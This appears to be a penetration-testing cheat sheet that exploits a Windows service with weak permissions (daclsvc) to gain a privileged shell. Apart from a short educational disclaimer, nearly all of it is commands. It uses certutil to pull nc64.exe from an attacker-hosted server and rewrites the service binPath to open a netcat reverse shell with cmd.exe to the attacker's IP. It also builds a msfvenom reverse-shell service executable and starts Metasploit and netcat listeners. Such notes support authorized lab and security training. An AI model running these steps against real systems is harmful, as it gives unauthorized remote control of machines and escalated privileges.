Disclaimer: This material is provided for educational purposes and authorized security testing only. You are solely responsible for how you use the information. Do not use these techniques on systems without explicit permission from the owner. We do not encourage any kind of illegal or harmful activity

Exploiting insecure service with Netcat

1. Host the nc binary using Python:
   python3 -m http.server 8000

   

   Note: Kali has a built-in copy of nc.exe located in /usr/share/windows-resources/binaries/.

2. Transfer the binary to the target machine using certutil:
   certutil -urlcache -f http://[IP-ADDRESS]:8000/nc64.exe nc64.exe

   

3. To exploit the service, place nc.exe in C:\Temp and modify the service binary path:
   sc config daclsvc binPath= "C:\Temp\nc64.exe [IP-ADDRESS] 443 -e C:\Windows\System32\cmd.exe"

   

4. On the attacker machine, set up a Netcat listener on port 443, then start the service:
   sc start daclsvc

   

Exploiting insecure service with Metasploit

1. Generate a reverse shell payload with msfvenom:
   msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=[PORT] -f exe-service -o reverse.exe

   

   Note: After creating the reverse shell payload, transfer it to the target machine.

2. Start a listener on the attacking machine with Metasploit:
   msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"

   

3. Alternatively, start a listener with Netcat:
   sudo rlwrap -cAr nc -lvnp 1338

4. Modify the service binary path and restart the service:
   

   sc config daclsvc binPath= "C:\Temp\reverse.exe"
   sc stop daclsvc
   sc start daclsvc
   

   or net start daclsvc